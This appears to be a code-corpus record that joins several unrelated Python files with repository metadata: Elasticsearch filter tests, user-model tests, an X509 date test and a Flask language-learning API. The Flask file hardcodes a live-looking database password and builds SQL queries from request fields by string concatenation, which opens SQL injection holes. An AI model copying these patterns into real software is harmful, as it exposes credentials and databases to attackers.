resp = query_by_tas(client, {"require": [_fa_path(BASIC_TAS)], "exclude": [_agency_path(BASIC_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_double_eclipsing_filters(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client, {"require": [_agency_path(BASIC_TAS), _tas_path(BASIC_TAS)], "exclude": [_fa_path(BASIC_TAS)]}
)
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_double_eclipsing_filters2(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client, {"require": [_fa_path(BASIC_TAS)], "exclude": [_agency_path(BASIC_TAS), _tas_path(BASIC_TAS)]}
)
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_sibling_eclipsing_filters(client, monkeypatch, elasticsearch_award_index, multiple_awards_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client,
{
"require": [_agency_path(BASIC_TAS), _tas_path(ATA_TAS)],
"exclude": [_agency_path(ATA_TAS), _tas_path(BASIC_TAS)],
},
)
assert resp.json()["results"] == [_award2()]
@pytest.mark.django_db
def test_sibling_filters_on_one_sibling(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_tas_path(SISTER_TAS[1])]})
assert resp.json()["results"] == [_award2()]
@pytest.mark.django_db
def test_sibling_filters_on_both_siblings(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[1])]})
assert resp.json()["results"].sort(key=lambda elem: elem["internal_id"]) == [_award1(), _award2()].sort(
key=lambda elem: elem["internal_id"]
)
@pytest.mark.django_db
def test_sibling_filters_excluding_one_sibling(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client, {"require": [_tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[2])], "exclude": [_tas_path(SISTER_TAS[2])]}
)
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_sibling_filters_excluding_two_siblings(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client,
{
"require": [_tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[1])],
"exclude": [_tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[2])],
},
)
assert resp.json()["results"] == [_award2()]
@pytest.mark.django_db
def test_sibling_filters_with_fa_excluding_one_sibling(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client,
{
"require": [_fa_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[2])],
"exclude": [_tas_path(SISTER_TAS[2])],
},
)
assert resp.json()["results"].sort(key=lambda elem: elem["internal_id"]) == [_award1(), _award2()].sort(
key=lambda elem: elem["internal_id"]
)
@pytest.mark.django_db
def test_sibling_filters_with_fa_excluding_two_siblings(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client,
{
"require": [_fa_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[1])],
"exclude": [_tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[2])],
},
)
assert resp.json()["results"] == [_award2()]
def _award1():
return {"internal_id": 1, "Award ID": "abcdefg", "generated_internal_id": "AWARD_1"}
def _award2():
return {"internal_id": 2, "Award ID": "abcdefg", "generated_internal_id": "AWARD_2"}
def _agency_path(index):
return [_agency(index)]
def _fa_path(index):
return [_agency(index), _fa(index)]
def _tas_path(index):
return [_agency(index), _fa(index), _tas(index)]
def _agency(index):
return TAS_DICTIONARIES[index]["aid"]
def _fa(index):
return f"{TAS_DICTIONARIES[index]['aid']}-{TAS_DICTIONARIES[index]['main']}"
def _tas(index):
return TAS_STRINGS[index]
def _sort_by_id(dictionary):
dictionary["internal_id"]
| 34.016447
| 120
| 0.736389
|
c5237d62756d3cd1377f8fc3d2b2a7f2734739bb
| 1,925
|
py
|
Python
|
tests/test_models.py
|
notna888/pyLaridae
|
4e07dcce30e818e0ad75001d579f4ad486e841f3
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
notna888/pyLaridae
|
4e07dcce30e818e0ad75001d579f4ad486e841f3
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
notna888/pyLaridae
|
4e07dcce30e818e0ad75001d579f4ad486e841f3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Model unit tests."""
import datetime as dt
import pytest
from pyLaridae.user.models import Role, User
from .factories import UserFactory
@pytest.mark.usefixtures("db")
class TestUser:
"""User tests."""
def test_get_by_id(self):
"""Get user by ID."""
user = User("foo", "foo@bar.com")
user.save()
retrieved = User.get_by_id(user.id)
assert retrieved == user
def test_created_at_defaults_to_datetime(self):
"""Test creation date."""
user = User(username="foo", email="foo@bar.com")
user.save()
assert bool(user.created_at)
assert isinstance(user.created_at, dt.datetime)
def test_password_is_nullable(self):
"""Test null password."""
user = User(username="foo", email="foo@bar.com")
user.save()
assert user.password is None
def test_factory(self, db):
"""Test user factory."""
user = UserFactory(password="myprecious")
db.session.commit()
assert bool(user.username)
assert bool(user.email)
assert bool(user.created_at)
assert user.is_admin is False
assert user.active is True
assert user.check_password("myprecious")
def test_check_password(self):
"""Check password."""
user = User.create(username="foo", email="foo@bar.com", password="foobarbaz123")
assert user.check_password("foobarbaz123") is True
assert user.check_password("barfoobaz") is False
def test_full_name(self):
"""User full name."""
user = UserFactory(first_name="Foo", last_name="Bar")
assert user.full_name == "Foo Bar"
def test_roles(self):
"""Add a role to a user."""
role = Role(name="admin")
role.save()
user = UserFactory()
user.roles.append(role)
user.save()
assert role in user.roles
| 28.731343
| 88
| 0.611948
|
24581d646e7fb9cd88142eaae17015665f477ce0
| 3,852
|
py
|
Python
|
electrum_dash/tests/test_x509.py
|
sibcool/electrum-dash
|
e123699b34260fe799aa5da818c33fa9cdf8e4c9
|
[
"MIT"
] | 1
|
2019-09-09T06:54:39.000Z
|
2019-09-09T06:54:39.000Z
|
electrum_dash/tests/test_x509.py
|
sibcool/electrum-dash
|
e123699b34260fe799aa5da818c33fa9cdf8e4c9
|
[
"MIT"
] | null | null | null |
electrum_dash/tests/test_x509.py
|
sibcool/electrum-dash
|
e123699b34260fe799aa5da818c33fa9cdf8e4c9
|
[
"MIT"
] | null | null | null |
import unittest
from electrum_dash.x509 import X509
class TestX509(unittest.TestCase):
def test_generalizedtime(self):
full = X509(b'0\x82\x05F0\x82\x03.\x02\t\x00\xfeV\xd6\xb5?\xb1j\xe40\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000d1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x0c\nCalifornia1!0\x1f\x06\x03U\x04\n\x0c\x18Internet Widgits Pty Ltd1\x1d0\x1b\x06\x03U\x04\x03\x0c\x14testnet.qtornado.com0 \x17\r180206010225Z\x18\x0f21180113010225Z0d1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x0c\nCalifornia1!0\x1f\x06\x03U\x04\n\x0c\x18Internet Widgits Pty Ltd1\x1d0\x1b\x06\x03U\x04\x03\x0c\x14testnet.qtornado.com0\x82\x02"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x02\x0f\x000\x82\x02\n\x02\x82\x02\x01\x00\xc2B\xe0\xa8\xd9$M\xbc)Wx\x0cv\x00\xc0\xfa2Ew:\xce\xa7\xcb\xc8\r?\xea\xc5R(\xc7\xc3Y\xe7zq=\xcd\x8d\xe3\x86\x9ecSI\xc7\x84\xf2~\x91\xd4\x19\xc2;\x97\xe81e\xf2\xeb\xf1\xadw\xa3p\x88A*-\r\xb6Yt\x98R\xe8\x8a\xf9\xb5>"F\xac\x19%\xc8~\x1d\xac\x93A\xffk\xce\xdb\xfc9\x05\xa0\xad\xf9V\x0f0\xa2b\xd0@\xe4\xf1\xb1\xe8\xb1\x10[&\xa1\xff\x13\xcfQ\xb7\x805\xef\xe7tL\xe5|\x08W\x8c\xd72\x9d\'\xeb\x92)3N\x01M\x06\xa9\xdc\xe4\'\x13\x90x\xd8\x830\x97\xa8\xcc2d \xfa\x91\x04\xd0\x1b\xe7\xaa t\x87\xba]\xb5w\x05(\xba\x07\xc2X$~?L\xc5\x03\xb2\xdeQ\xf3\xf3\xdab\xd9\x92\xd9\x86^:\x93\xc9\x86~\xd1\x94\xd4\x80\x9c\xff0\xc6m\xf4\xf0\xd6\x18\x96l\x1d\x0c\xe8\x15 \x8c\x89\xcb\xa4*\xd9\xefg\x844\x81\xb3\xce\xa1\x8a|\xf9h\xc3\xe1!\xfeZ`\xb71\x97Kj\x0b"\xd3\x98T\r\xd9\xbb<r\x0c\xd5Q\xd0L\x02\xcb\x19\x19\xd6\xdf$\xcej\xa8l\xbd\x81\x803\x95\x0e\x907&\x81J\x88\xaf\xa23\xb4q\x96\x08\xa9]}\xb8Rs\x89{\x04\x88/\xc1m\x8c\xe8\\X\x95 \x1cj\xf2(t\xd7\xef\x10-r\xb6\x17L\xce_\x1bf\xc0c\x18\x83\x99\xdf\xd5\xad\x88\xcd \xae\x07 \xed\xb6\xfc[\x9a/f\x92\xce^\x9c\xd9\x064\xb4\xcc\x1d,d\x99\xee\x9a4\xbe\xde0\x92\x8f/keq\x94\x9frf1\xda\xadM_\x11C\x19\x01\xf0\xe0I\x84W\xf9\xaa\xd3\x12ex\x89"\xbfQ\x1f\xbdU\xa0\x92\xa3\x9d\xdb?\x86\x82\x0b\x1e\xe0\x8aSq\xce%\xea4\xfb\x82\x92\x0f\xcf\xaa\xe2\r\xedd\xba\xff\x85\xa2+\xb0x9\xba\'\xd3\xf5\xd6\xfa\xb43\x0b\xd4\xf4\xca\xa5\xb1\xe4[\xe7\xf7\xc3\xd3\xdd\x85)\xac5E\x17\xae\x03fCC(\x06\x1cU\xedM\x90r\xe87\x8d}\xf1i\xfdO\x83\x05\x83\x83y\xd9f,\xe1\xba\xf0\\y\x8d\x08`\xb1\x02\x03\x01\x00\x010\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x00\x03\x82\x02\x01\x00,.\x12jC3\x9fdF\x15\x16\xea*1\x0b[\xfa-\xcf\x80\x17\xf0\xfa\xf4\x96C\xff\xf9\xe9\xa2N\xda\xf1&6\x9ecV~\xea[\x07\xc1R\x03\x95\xd4\x84B\xe2r\x92\xad<mp\xf1\xcb\xb3\x8b\xbf \x08\x12\x1e6\xe3\xad\xbd1\x81\xbe\xaex\x002\xb6\xf9\xa0\xf6\xb7E^"\r\xa0w\x08\x14\xe7\x84\x03q2\x9c\xac\xce>\xc6\x0b\x81\x81k\x0e\xd01\x16\x91\xe4A\x8c\x1a\xe9W\xd4=<\xd4m_\xd4m\xa4H\x14\xc0\xae\x12\xab\x808\xf1\xf9_\xbb\xfb\xd0U\x0e\\\xd3.?\xa36\xe1hstU"\x17P\xcb>\x83\x9c\xaa\x9b\xb7\xe5\xb4\xb5W\xdc\xc1\xee\x91K\x12\xc2\xe1U\xaf\xf7I`\x83\x91\x0c\xc0\xcb\x15\x13!V\xa9\xc1\xca\x1b\x80\xff\xd8\x1f\xd8_+\x83\xcd\xcb%\xd6\xb7\xdc\x8a2\xa8Q\x1f\xbb.\xdf\x05\xb7hD\xab\xea\xe9\xfb.\xdd\x93\xd1\xf0\xb8r\xb9t.\xab\xf6]\xac\xc9U9\x87\x9e\xe36 \x87\xe7eo\x98\xac\xf4\x87\x8e\xf4\xa86\xd3\xcapy\xee\xa0]\xdbA\xb9\x00\xe9_R\xc8\xf7\xca\x13\xc6\xb1Z|c\xe8v\xa24\xac?k\xf1\xc4\x97\x18\x07\xbaU\xc9\xf5? \x95\x8f\x11\xa7\xc9\x8eY\x9c\xdfnx?\x88\xba\x90\xef\x94WU\xb5\xcf\x0b"\xe8\xfe\xa6.\x0cr-\xaf3\x8a\xe6v\xf9\xb91\x87\x91\xc6\xb1\xe9\xb9UP\xf5\x14\xb7\x99\x80\xc0\xc5}\x9a~\x7f\x06\x1e\xb8\x05\xd5\xa2LXO\\73i\x82\xcd\xc6#\xb7\xa4q\xd7\xd4y\xb1d\xaf\xa8\t\x9e1K\xd94\xaf7\x08\x8c);\xd2\xed\x91\xc6\xed\x83\x90\r\xef\x85\xf0\xfeJi\x02;\xf0\x0b\x03\xe7\xc1\x84\xd45\xaeP\xc2Lp\x1akb\xcaP\xe9\xfc\xc1\xc8VPQu\x85\x92l\x12\xb99{\x91\xd0\xa6d\n\xde\xf85\x93e\xfa\\\xf9cKx8\x84"s\xb8\xe52~\x97\x05\xc3\xf6\x1c\xca\x0b\xda\x8b\x90\xfeu5,\x94,\x99\xf9\x9a\xf3T\x8dAZ\xc7\xe9\x95-\x98\xf2\xbaL\x89\xc0?\xba1\xb5\\t|RY_\xc6\xabr\xe8')
full.check_date()
| 550.285714
| 3,702
| 0.74325
|
f9f566caf8bd8154305b0fa8f078c09b96f33884
| 20,510
|
py
|
Python
|
application.py
|
escottgoodwin/langoapi
|
9f5e88a664addd2899968728049d5982cc2cecfe
|
[
"MIT"
] | null | null | null |
application.py
|
escottgoodwin/langoapi
|
9f5e88a664addd2899968728049d5982cc2cecfe
|
[
"MIT"
] | 2
|
2021-03-31T18:56:16.000Z
|
2021-12-13T19:56:21.000Z
|
application.py
|
escottgoodwin/langoapi
|
9f5e88a664addd2899968728049d5982cc2cecfe
|
[
"MIT"
] | null | null | null |
from random import randint
import os
from bs4 import BeautifulSoup
import json
from textblob import TextBlob
from gensim.models.doc2vec import Doc2Vec,TaggedDocument
import datetime
from datetime import datetime,timedelta
import requests
import json
from stop_words import get_stop_words
import boto3
from scipy.spatial.distance import cosine
import goslate
import botocore
import psycopg2
import numpy as np
from operator import itemgetter
import pandas as pd
from flask import Flask, render_template, Response, request, redirect, url_for,session
application = app = Flask(__name__)
dbuser = os.environ['dbuser']
dbname = os.environ['dbname']
dbhost = os.environ['dbhost']
dbpassword= os.environ['dbpassword']
aws_access_key_id = os.environ['aws_access_key_id']
aws_secret_access_key = os.environ['aws_secret_access_key']
dbconnect = "dbname='"+dbname+"' user='"+dbuser+"' host='"+dbhost+"' password='"+dbpassword+"'"
app.secret_key = os.urandom(24)
def recent_arts(lang,days):
col_name = lang +'_vecs'
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
sql = "SELECT art_id,vec FROM " + col_name + " where dt > now() - interval '"+str(days)+ " days'"
cur.execute(sql)
recent_vecs = cur.fetchall()
conn.close()
rec_vec_np = [[x[0],np.array(x[1])] for x in recent_vecs]
return rec_vec_np
def user_prog_list(user_id):
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
sql="SELECT lang,exer_type,exer_resp FROM exer_progress WHERE user_id = '" + user_id + "'"
cur.execute(sql)
exercises = cur.fetchall()
conn.close()
if len(exercises)>0:
progrpt = progress_list(exercises)
return progrpt
else:
return 'none'
def progress_list(exercise_list):
progdf = pd.DataFrame(exercise_list)
grped = progdf.groupby([0,1])
grplist = [x for x in grped]
prog_list = [[x[0],str(round((x[1][x[1][2]==True].count()[0]/x[1].count()[0])*100,1)),str(x[1].count()[0])] for x in grplist]
task_list = []
for x in prog_list:
lang = x[0][0]
if lang == 'de':
langt = 'German'
if lang == 'fr':
langt = 'French'
if lang == 'en':
langt = 'English'
if lang == 'es':
langt = 'Spanish'
exer = x[0][1]
if exer == 'image':
task = 'Image Identification'
if exer == 'verb_comp':
task = 'Verb Sentences'
if exer == 'sent_comp':
task = 'Sentence Completion'
item = {'langt':langt,'task':task,'percent':x[1],'total':x[2]}
task_list.append(item)
return task_list
def friend_list(user_id_friend,status):
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
sql="SELECT relationships.userid1,relationships.userid2,relationships.request_date,relationships.accept_date,user_ids.name FROM relationships,user_ids WHERE ((relationships.userid1 = "+str(user_id_friend)+" AND user_ids.id = "+str(user_id_friend)+") OR (relationships.userid2 = "+str(user_id_friend)+") AND user_ids.id = "+str(user_id_friend)+") AND relationships.status = " +str(status)
cur.execute(sql)
friend_rslt = cur.fetchall()
conn.close()
friends_list = []
for x in friend_rslt:
if x[0] != user_id_friend:
friends_list.append(x)
if x[1] != user_id_friend:
friends_list.append(x)
friends_list1 = [{'request_date':x[2].strftime('%m/%d/%Y'),'accept_date':x[3],'name':x[4]} for x in friends_list]
return friends_list1
def fetch_recs_id(friend_ids):
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
sql='SELECT id,name,native_lang,residence,login_status FROM user_ids WHERE id IN %s'
cur.execute(sql,(friend_ids,))
friend_list = cur.fetchall()
dictrecs = [{'id':x[0],'name':x[1],'nativ_lang':x[2],'residence':x[3],'login_status':x[4]} for x in friend_list]
return dictrecs
def cosine_rank(target_vec,time_vec,rec_num):
dists = []
for vec in time_vec:
dist = 1 - cosine(target_vec,vec[1])
item = [dist,vec[0]]
dists.append(item)
ranked = sorted(dists, key=itemgetter(0),reverse=True)
return ranked[:rec_num]
def art_parser(link):
r = requests.get(link)
page = r.text
soup = BeautifulSoup(page,"lxml")
for x in soup('script'):
x.decompose()
for x in soup('link'):
x.decompose()
for x in soup('meta'):
x.decompose()
title = soup.title.string
paras = soup('p')
atriclestrip = [art.get_text() for art in paras]
art = ' '.join(atriclestrip)
return art,link,title
def load_models_s3(lang):
bucket_name = 'langlearn84'
KEY1 = lang + 'model3.model'
KEY2 = lang + 'model3.model.trainables.syn1neg.npy'
KEY3 = lang + 'model3.model.wv.vectors.npy'
# if d2v model not in directory, download it
if not os.path.exists(KEY1):
s3 = boto3.resource(
's3',
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key
)
try:
s3.Bucket(bucket_name).download_file(KEY1, KEY1)
print(KEY1)
s3.Bucket(bucket_name).download_file(KEY2, KEY2)
print(KEY2)
s3.Bucket(bucket_name).download_file(KEY3, KEY3)
print(KEY3)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == "404":
print("The object does not exist.")
else:
raise
lang_model = Doc2Vec.load(KEY1)
else:
lang_model = Doc2Vec.load(KEY1)
return lang_model
def langname(lang_select):
if lang_select == 'es':
langt = 'Spanish'
if lang_select == 'fr':
langt = 'French'
if lang_select == 'de':
langt = 'German'
if lang_select == 'en':
langt = 'English'
return langt
def list_routes():
return ['%s' % rule for rule in app.url_map.iter_rules()]
@application.route("/")
def hello():
routelinks = list_routes()
html = "<h1 style='color:blue'>Routes</h1>"
for link in routelinks:
html += '<P><H3>'+link+'</H3></P>'
return html
@application.route("/apis/single_art", methods=['POST'])
def single_art():
#trans_art = request.json['trans_art']
trans_lang = request.json['trans_lang']
art_id = request.json['art_id']
colnm = trans_lang + '_arts'
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql = "SELECT link,title,article,art_id FROM " + colnm + " WHERE art_id = '" + art_id + "'"
cur.execute(sql)
article1 = cur.fetchone()
dictart = {'link':article1[0],'title':article1[1],'article':article1[2],'art_id':article1[3]}
conn.close()
resp=json.dumps(dictart)
return resp
@application.route("/apis/link_search", methods=['POST'])
def link_search():
def trans_art(link,trans_lang):
art,link,title = art_parser(link)
trans_art = [str(TextBlob(art).translate(to=trans_lang))]
return trans_art,title
#trans_art = request.json['trans_art']
trans_lang = request.json['trans_lang']
link = request.json['link']
daterange = request.json['daterange']
trans_art,title = trans_art(link,trans_lang)
if trans_lang == 'es':
langt = 'Spanish'
lang_model = eslang_model
colnm = trans_lang +'_arts'
if trans_lang == 'fr':
langt = 'French'
lang_model = frlang_model
colnm = trans_lang +'_arts'
if trans_lang == 'de':
langt = 'German'
lang_model = delang_model
colnm = trans_lang +'_arts'
stop_words = get_stop_words(trans_lang)
histnostop = [[i for i in doc.lower().split() if i not in stop_words] for doc in trans_art]
dlhist_tagged = [TaggedDocument(doc,[i]) for i,doc in enumerate(histnostop)]
## infer vectors from current doc2model
trans_lang_vec = [lang_model.infer_vector(doc.words) for doc in dlhist_tagged]
rec_num = 20
#sims = lang_model.docvecs.most_similar(trans_lang_vec, topn=rec_num)
#load to time matrix
vec_range = recent_arts(trans_lang,daterange)
rankedvec = cosine_rank(trans_lang_vec,vec_range,rec_num)
sims1= [x[1] for x in rankedvec]
sims2= tuple(sims1)
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT link,title,art_id FROM " + colnm + " WHERE art_id IN %s"
cur.execute(sql,(sims2,))
recs = cur.fetchall()
dictrecs = [{'link':x[0],'title':x[1],'art_id':x[2]} for x in recs]
conn.close()
payload = {'recs':dictrecs,'link':link,'title':title,'trans_lang':trans_lang,'langt':langt}
resp=json.dumps(payload)
return resp
@application.route("/apis/link_search_pg", methods=['POST'])
def link_search_pg():
def trans_art(link,trans_lang):
art,link,title = art_parser(link)
trans_art = [str(TextBlob(art).translate(to=trans_lang))]
return trans_art,title
#trans_art = request.json['trans_art']
trans_lang = request.json['trans_lang']
link = request.json['link']
trans_art,title = trans_art(link,trans_lang)
if trans_lang == 'es':
langt = 'Spanish'
lang_model = eslang_model
colnm = trans_lang +'_arts'
if trans_lang == 'fr':
langt = 'French'
lang_model = frlang_model
colnm = trans_lang +'_arts'
if trans_lang == 'de':
langt = 'German'
lang_model = delang_model
colnm = trans_lang +'_arts'
stop_words = get_stop_words(trans_lang)
histnostop = [[i for i in doc.lower().split() if i not in stop_words] for doc in trans_art]
dlhist_tagged = [TaggedDocument(doc,[i]) for i,doc in enumerate(histnostop)]
## infer vectors from current doc2model
trans_lang_vec = [lang_model.infer_vector(doc.words) for doc in dlhist_tagged]
rec_num = 20
sims = lang_model.docvecs.most_similar(trans_lang_vec, topn=rec_num)
sims1= [int(x[0]) for x in sims]
sims2= tuple(sims1)
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT link,title,art_id FROM " + colnm + " WHERE id IN %s"
cur.execute(sql,(sims2,))
recs = cur.fetchall()
dictrecs = [{'link':x[0],'title':x[1],'art_id':x[2]} for x in recs]
conn.close()
payload = {'recs':dictrecs,'link':link,'title':title,'trans_lang':trans_lang,'langt':langt}
dump = [payload,sims2]
resp=json.dumps(payload)
return resp
@application.route("/apis/vocab_ins", methods=['POST'])
def vocab_ins():
vocab_word = request.json['vocab_word']
trans_word = request.json['trans_word']
user_id = request.json['user_id']
date = request.json['date']
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
QueryData = "('"+ user_id +"','" + vocab_word + "','" + trans_word +"','"+ date +"')"
cur.execute('INSERT INTO vocab (user_id,word,translation,date) VALUES ' + QueryData)
conn.commit()
conn.close
payload = { 'vocab_word': vocab_word, 'trans_word': trans_word}
resp=json.dumps(payload)
return resp
@application.route("/apis/exer_progress", methods=['POST'])
def exer_progress():
lang_select = request.json['lang_select']
item = request.json['item']
user_id = request.json['user_id']
exer_date = request.json['exer_date']
exer_type = request.json['exer_type']
exer_resp = request.json['exer_resp']
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
QueryData = "('"+ lang_select +"','" + item + "','" + user_id +"','"+ exer_date +"','"+ exer_type +"','"+ str(exer_resp) +"')"
cur.execute('INSERT INTO exer_progress (lang,item,user_id,exer_date,exer_type,exer_resp) VALUES ' + QueryData)
conn.commit()
conn.close
payload = { 'item ': item , 'exer_resp': exer_resp}
resp=json.dumps(payload)
return resp
@app.route("/apis/art_recs", methods=['GET','POST'])
def art_recs():
lang_select = request.args.get('values')
trans_lang = request.args.get('trans_lang')
user_id = session.get('user_id')
db_name = 'arts_recs'
colnm = trans_lang +'_arts'
link_recs = []
clusters = [['46c47616895140a28fcf5f7c368357ae',
'43db6fcc5bd14b4584d78478ef8a4831',
'39ff78c46b1b4db6baa2a84a670c84ba'],
['6404d798aa1547fca35f11693328d318',
'424be85fad2c4448b944e7e795df857e',
'008a5bdb929a4360b2a113feed312bf5'],
['1bd11f965c934560b0caa0c7e29388d1',
'213478cc4a904f279ef38e52d2b0e7d4',
'bb77defbe39c4d0da78ca28c9d82a8bd']
]
rec_clusters = []
for cluster in clusters:
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT link,title,art_id FROM " + colnm + " WHERE art_id IN %s"
cur.execute(sql,(cluster,))
recs = cur.fetchall()
dictrecs = [{'link':x[0],'title':x[1],'art_id':x[2]} for x in recs]
rec_clusters.append(dictrecs)
conn.close()
#link_recs = [[gcol.find_one({ "id" : db_id },projection={'_id': False,'title':True,'link':True,'id':True}) for db_id in db_ids] for db_ids in recs]
return rec_clusters
@app.route("/apis/image_rec", methods=['GET','POST'])
def image_rec():
lang_select = request.json['lang_select']
colnm = lang_select+'_pics'
langt = langname(lang_select)
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT link,term FROM " + colnm + " ORDER BY random() LIMIT 1"
cur.execute(sql)
pic= cur.fetchall()
conn.close()
payload = {'link':pic[0][0],'term':pic[0][1],'lang_select':lang_select,'langt':langt}
resp=json.dumps(payload)
return resp
@app.route("/apis/verbcompletion", methods=['GET','POST'])
def verb_comp():
lang_select = request.json['lang_select']
native_lang = request.json['native_lang']
db_name = 'sent_combo'
def verb_random():
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT verb FROM sc_verbs ORDER BY random() LIMIT 1"
cur.execute(sql)
verb = cur.fetchone()
conn.close()
return verb[0]
def noun_random():
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT noun FROM sc_nouns ORDER BY random() LIMIT 1"
cur.execute(sql)
noun = cur.fetchone()
conn.close()
return noun[0]
def gen_sent():
verb = verb_random()
noun = noun_random()
article = ['a','the']
j = randint(0,1)
art = article[j]
return verb + ' ' + art + ' ' + noun
sent = gen_sent()
blob = TextBlob(sent)
learn_sent = blob.translate(to=lang_select)
native_sent = str(learn_sent.translate(to=native_lang)).capitalize()
trans_sent = str(learn_sent).capitalize()
langt = langname(lang_select)
payload = {'trans_sent':trans_sent,'native_sent':native_sent,'lang_select':lang_select,'langt':langt}
resp=json.dumps(payload)
return resp
@app.route("/apis/sentcompletion", methods=['GET','POST'])
def sent_comp():
lang_select = request.json['lang_select']
pos1 = request.json['pos']
colnm = lang_select+'_sents'
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT blanks,answer,speech,id FROM " + colnm + " WHERE pos = '" + pos1 + "' ORDER BY random() LIMIT 1"
cur.execute(sql)
sent = cur.fetchall()
conn.close()
langt = langname(lang_select)
payload = {'item_id':str(sent[0][3]),'exer_blanks':sent[0][0],'translate':sent[0][2],'answer':sent[0][1],'lang_select':lang_select,'langt':langt}
resp=json.dumps(payload)
return resp
@app.route("/apis/translate_tt", methods=['GET','POST'])
def translate_tt():
lang = request.json['lang']
text = request.json['text']
gs = goslate.Goslate()
translatedtext = gs.translate(text,lang)
payload = {'translatedText':translatedtext}
resp=json.dumps(payload)
return resp
@app.route("/apis/prog_list", methods=['GET','POST'])
def prog_list():
user_id = request.json['user_id']
progressuserid = user_prog_list(user_id)
payload = {'progressuserid':progressuserid}
resp=json.dumps(payload)
return resp
@app.route("/apis/user_detail", methods=['GET','POST'])
def user_detail():
user_id = request.json['user_id']
login_status = 'on_line'
last_login = str(datetime.now())
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
sql = "UPDATE user_ids SET login_status = '" + login_status +"',last_login='"+ last_login+"' WHERE user_id = '" + user_id + "'"
cur.execute(sql)
conn.commit()
sql1 = "select id,native_lang,learning,user_id,name from user_ids where user_id='"+ user_id + "'"
cur.execute(sql1)
user_rslt = cur.fetchone()
native_lang = user_rslt[1]
user_pk_id = user_rslt[0]
learning = user_rslt[2]
user_id = user_rslt[3]
name = user_rslt[4]
conn.close()
payload = {'native_lang':native_lang,'learning':learning,'user_id':user_id,'name':name}
resp=json.dumps(payload)
return resp
@app.route("/apis/friends_search", methods=['GET','POST'])
def friends_search():
age_src = request.json['age_src']
srch_native_lang = request.json['srch_native_lang']
gender = request.json['gender']
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
if len(age_src)>0:
agelow = str(age_src[0])
agehigh = str(age_src[1])
age_qry = " AND age BETWEEN " + agelow + " AND " + agehigh
else:
age_qry = ''
